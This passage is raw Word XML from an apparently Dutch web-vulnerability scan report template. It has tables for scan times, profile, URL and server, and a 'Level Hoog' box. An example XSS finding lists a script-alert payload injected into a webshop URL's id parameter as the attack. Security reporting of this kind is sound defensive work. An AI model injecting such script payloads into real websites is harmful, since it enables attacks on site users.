                        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                      </w:tblPr>
                      <w:tblGrid>
                        <w:gridCol w:w="4301"/>
                        <w:gridCol w:w="4301"/>
                      </w:tblGrid>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="77C3248A" w14:textId="77777777" w:rsidTr="001379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273001D6" w14:textId="4C9C1179" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Algemene informatie</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="5A213CD9"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145DAC02" w14:textId="1A5726B3" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Start tijd</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4301" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="689C9587" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="3EEAFBDF"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82844BF" w14:textId="1C746F68" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>Eind tijd</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4301" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="4BE22D27" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="41CCB9AE"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57CD7785" w14:textId="39E29C1C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Scan tijd</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4301" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="006F1D89" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="7D1AE873"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65FC28CB" w14:textId="458BA1E8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Profiel</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4301" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="15B5DE39" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="7EA7A113"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6E2DA85D" w14:textId="7FDB3F3F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4301" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="68A0DF69" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="299EEE57"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20A6A62" w14:textId="3D390C41" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t xml:space="preserve">Server </w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4301" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="24A002FA" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p w14:paraId="580CEE11" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008E476E" w:rsidRPr="00A962C1">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252023808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="427CF2AA" wp14:editId="053796B4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>755015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2529205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1333500" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22860"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21363"/>
                    <wp:lineTo x="21806" y="21363"/>
                    <wp:lineTo x="21806" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="488" name="Rounded Rectangle 488"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1333500" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:gradFill>
                          <a:gsLst>
                            <a:gs pos="18000">
                              <a:schemeClr val="bg1"/>
                            </a:gs>
                            <a:gs pos="43000">
                              <a:schemeClr val="accent4">
                                <a:lumMod val="20000"/>
                                <a:lumOff val="80000"/>
                              </a:schemeClr>
                            </a:gs>
                            <a:gs pos="82000">
                              <a:schemeClr val="accent4">
                                <a:lumMod val="40000"/>
                                <a:lumOff val="60000"/>
                              </a:schemeClr>
                            </a:gs>
                            <a:gs pos="100000">
                              <a:schemeClr val="accent4">
                                <a:lumMod val="60000"/>
                                <a:lumOff val="40000"/>
                              </a:schemeClr>
                            </a:gs>
                          </a:gsLst>
                          <a:lin ang="10800000" scaled="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46EE1A3" id="Rounded Rectangle 488" o:spid="_x0000_s1026" style="position:absolute;margin-left:59.45pt;margin-top:199.15pt;width:105pt;height:18.2pt;flip:y;z-index:252023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bEJRkDAABkBwAADgAAAGRycy9lMm9Eb2MueG1srFVNTxsxEL1X6n+wfC+bTQKlERsUgagq0YKA&#10;lrPj9SYreW3Xdj7or++zvbsEmiC16sWyxzNvZt6Mx2fn20aStbCu1qqg+dGAEqG4Lmu1KOj3h6sP&#10;p5Q4z1TJpFaioE/C0fPp+3dnGzMRQ73UshSWAES5ycYUdOm9mWSZ40vRMHekjVC4rLRtmMfRLrLS&#10;sg3QG5kNB4OTbKNtaazmwjlIL9MlnUb8qhLc31SVE57IgiI2H1cb13lYs+kZmywsM8uat2Gwf4ii&#10;YbWC0x7qknlGVrb+A6qpudVOV/6I6ybTVVVzEXNANvngVTb3S2ZEzAXkONPT5P4fLP+2vrWkLgs6&#10;PkWpFGtQpDu9UqUoyR3oY2ohBQmXoGpj3AQW9+bWtieHbch7W9mGVLI2P9AFkQnkRraR6KeeaLH1&#10;hEOYj0aj4wHqwXE3HOX5OFYiSzgBz1jnPwvdkLApqA0RhXAiNFtfO48AoN/ptdyXV7WUce+gkjbE&#10;aBCWnw7gMEhib4kLacmaoSvmizykBqyF2zUYjw4YMM6F8uOIJVfNV10mILQjPACKTSBG2yVx8Ntl&#10;17ve4+802O8L8JC/cQf80t9JJ0ZGb/nLg95fOeyRXzrs49jrMPLa1kLWiqCfUIxBZAUN4DiTAt3X&#10;MYSn2NdQqlguLete1CeUuPXbrnbuWQseg2UWmjW1Z9z5JylibdSdqNDxaMPhYbpTD7slK0VyhXY9&#10;UEYZAANyhd7rsVuAMMeeey2Vsou51Q+mIo6q3viNsnTGvUX0rJXvjZtaabsvM+k74yrpdyQlagJL&#10;c10+YR5YnQalM/yqxgO8Zs7fMovJiJJh2vsbLJXUm4LqdkfJUttf++RBHwMLt5RsMGkL6n6umBWU&#10;yC8KL/NTPsbzJz4exscfhzjY3Zv57o1aNRcazzZH7xget0Hfy25bWd084lOYBa+4YorDd0G5t93h&#10;wqcfAN8KF7NZVMM4Nsxfq3vDA3hgNcyWh+0js6adQh7z65vupjKbvJpDSTdYKj1beV3VcUg989ry&#10;jVGe3n/6dsJfsXuOWs+f4/Q3AAAA//8DAFBLAwQUAAYACAAAACEAEUORfd4AAAALAQAADwAAAGRy&#10;cy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVIbBB12lRpEuJUiMeSBYUPcOMhThOPo9htw98zXdHl&#10;nTm6c6bazm4QJ5xC50nBcpGAQGq86ahV8P31/piDCFGT0YMnVPCLAbb17U2lS+PP9ImnXWwFl1Ao&#10;tQIb41hKGRqLToeFH5F49+MnpyPHqZVm0mcud4NcJUkmne6IL1g94ovFpt8dnQLfyt4W9PYa+jRm&#10;/ebjMGcPB6Xu7+bnJxAR5/gPw0Wf1aFmp70/kgli4LzMC0YVpEWegmAiXV0mewXrdL0BWVfy+of6&#10;DwAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFNmxCUZAwAAZAcAAA4AAAAAAAAAAAAAAAAA&#10;LAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABFDkX3eAAAACwEAAA8AAAAAAAAAAAAA&#10;AAAAcQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAB8BgAAAAA=&#10;" fillcolor="white [3212]" strokecolor="black [3213]" strokeweight="1pt">
                <v:fill color2="#ffd966 [1943]" angle="-90" colors="0 white;11796f white;28180f #fff2cc;53740f #ffe699" type="gradient">
                  <o:fill v:ext="view" type="gradientUnscaled"/>
                </v:fill>
                <v:stroke joinstyle="miter"/>
                <w10:wrap type="through"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BC0D41" w:rsidRPr="00A962C1">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252022784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F7A910F" wp14:editId="5E4A58F7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2186305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2032635" cy="688340"/>
                <wp:effectExtent l="0" t="0" r="24765" b="22860"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21520"/>
                    <wp:lineTo x="21593" y="21520"/>
                    <wp:lineTo x="21593" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="35" name="Rounded Rectangle 35"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2032635" cy="688340"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="dk1"/>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="lt1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="dk1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7AA96D95" w14:textId="72FCCD7F" w:rsidR="00CE4BB5" w:rsidRPr="001D7501" w:rsidRDefault="00CE4BB5" w:rsidP="001D7501">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Level </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Hoog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7A910F" id="Rounded Rectangle 35" o:spid="_x0000_s1105" style="position:absolute;left:0;text-align:left;margin-left:29.15pt;margin-top:172.15pt;width:160.05pt;height:54.2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3R/nECAAAsBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bhHfEBkUgqkoIEFBx&#10;drx2sqrtccdOdtNf37H3AaKoh6oXr2fn/c03vrhsrWE7haEGV/LpwYQz5SRUtVuX/PvzzZczzkIU&#10;rhIGnCr5XgV+ufj86aLxczWDDZhKIaMgLswbX/JNjH5eFEFulBXhALxypNSAVkQScV1UKBqKbk0x&#10;m0xOigaw8ghShUB/rzslX+T4WisZ77UOKjJTcqot5hPzuUpnsbgQ8zUKv6llX4b4hyqsqB0lHUNd&#10;iyjYFus/QtlaIgTQ8UCCLUDrWqrcA3Uznbzr5mkjvMq9EDjBjzCF/xdW3u0ekNVVyQ+POXPC0owe&#10;YesqVbFHQk+4tVGMdARU48Oc7J/8A/ZSoGvqutVo05f6YW0Gdz+Cq9rIJP2cTQ5nJymJJN3J2dnh&#10;UUa/ePX2GOJXBZalS8kxlZFqyMCK3W2IlJbsBzsSUkldEfkW90alOox7VJq6Smmzd+aTujLIdoKY&#10;UP2YpoYoVrZMLro2ZnSafuRk4uDU2yY3lTk2Ok4+cnzNNlrnjODi6GhrB/h3Z93ZD113vaa2Y7tq&#10;8whPZ8OYVlDtaa4IHeGDlzc1gXorQnwQSAynXaCtjfd0aANNyaG/cbYB/PXR/2RPxCMtZw1tTMnD&#10;z61AxZn55oiS59MjGimLWTg6Pp2RgG81q7cat7VXQKOY0vvgZb4m+2iGq0awL7Tcy5SVVMJJyl1y&#10;GXEQrmK3yfQ8SLVcZjNaKy/irXvyMgVPQCe+PLcvAn3PrEicvINhu8T8Hbc62+TpYLmNoOtMvAR1&#10;h2s/AlrJzKH++Ug7/1bOVq+P3OI3AAAA//8DAFBLAwQUAAYACAAAACEABdBnVeEAAAAKAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPTU+DQBCG7yb+h82YeLNLC7UEWZpGYxpNjBE/zlsYWSw7S9il4L93&#10;POltJvPknefNt7PtxAkH3zpSsFxEIJAqV7fUKHh7vb9KQfigqdadI1TwjR62xflZrrPaTfSCpzI0&#10;gkPIZ1qBCaHPpPSVQav9wvVIfPt0g9WB16GR9aAnDredXEXRtbS6Jf5gdI+3BqtjOVoFHzu3f5bj&#10;49P70ZTBfD3QdLfcK3V5Me9uQAScwx8Mv/qsDgU7HdxItRedgnUaM6kgThIeGIg3aQLioCBZrzYg&#10;i1z+r1D8AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMnN0f5xAgAALAUAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAAXQZ1XhAAAACgEAAA8AAAAA&#10;AAAAAAAAAAAAyQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADXBQAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7AA96D95" w14:textId="72FCCD7F" w:rsidR="00CE4BB5" w:rsidRPr="001D7501" w:rsidRDefault="00CE4BB5" w:rsidP="001D7501">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Level </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Hoog</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A962C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Eerste pagina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1AC01" w14:textId="055432FB" w:rsidR="00706E60" w:rsidRDefault="00EB5F64" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252027904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69A2B2A9" wp14:editId="65C1EBE6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5078730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="1945640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40" name="Text Box 40"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5524500" cy="1945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GridTable2-Accent3"/>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                            </w:tblPr>
                            <w:tblGrid>
                              <w:gridCol w:w="4201"/>
                              <w:gridCol w:w="4201"/>
                            </w:tblGrid>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="776EB50A" w14:textId="77777777" w:rsidTr="00063C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2" w:type="dxa"/>
                                  <w:gridSpan w:val="2"/>
                                </w:tcPr>
                                <w:p w14:paraId="6E48BC5A" w14:textId="6D4E7C57" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Kwetsbaarheden details</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="7418281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2B9ED22A" w14:textId="5DC7013A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Kwetsbaarheid</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="06F15A0C" w14:textId="3686E61D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:t>XSS</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="086D8617"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6D2433A5" w14:textId="4EE40AEB" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Omschrijving</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="20DE3A41" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="329C4B3C"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CBDD5DA" w14:textId="3B61DF4A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>URL</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="49C2008F" w14:textId="7C34BA70" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>www.webshop.nl?id</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t>=&lt;script&gt;alert(34c829ctn7) &lt;/script&gt;</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="2684DBE0"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30FF1C1B" w14:textId="124E2D6F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Aanval</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="45E61372" w14:textId="58A0C7B8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:t>&lt;</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>script</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t>&gt;alert(34c829ctn7) &lt;/script&gt;</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="7916B213"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51F3E396" w14:textId="5C31A954" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Impact</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="146EC8B6" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="07BFCFFF"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76BA7970" w14:textId="7839E995" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Oplossing</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="6AD1A550" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="3AF5DAE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49B2CB2" w14:textId="60C2F2D0" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>WASC ID</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
